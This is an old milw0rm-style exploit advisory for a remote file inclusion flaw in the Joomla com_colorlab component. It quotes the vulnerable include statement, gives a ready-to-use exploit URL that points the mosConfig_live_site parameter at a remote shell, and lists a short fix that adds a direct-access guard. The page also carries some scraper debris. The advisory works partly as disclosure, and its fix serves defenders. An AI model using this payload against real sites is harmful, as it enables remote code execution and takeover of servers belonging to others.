40 lines
No EOL
678 B
Text
40 lines
No EOL
678 B
Text
--------------------
|
|
|
|
Joomla com_colorlab Remote File Include
|
|
|
|
--------------------
|
|
|
|
Found : xoron
|
|
|
|
--------------------
|
|
|
|
Download:
|
|
http://download.joomlaportal.ch/content/view/474/
|
|
|
|
--------------------
|
|
|
|
Wrong Code:
|
|
include( "$mosConfig_live_site/components/com_color/about.html" );
|
|
|
|
--------------------
|
|
|
|
Exploit:
|
|
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?
|
|
|
|
--------------------
|
|
|
|
How to Fix:
|
|
1-open admin.colo.php
|
|
2-write this codes before wrong codes
|
|
|
|
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
|
|
|
|
3-save and exit
|
|
|
|
--------------------
|
|
|
|
Thanx: mdx :)
|
|
|
|
--------------------
|
|
|
|
# milw0rm.com [2007-10-12] |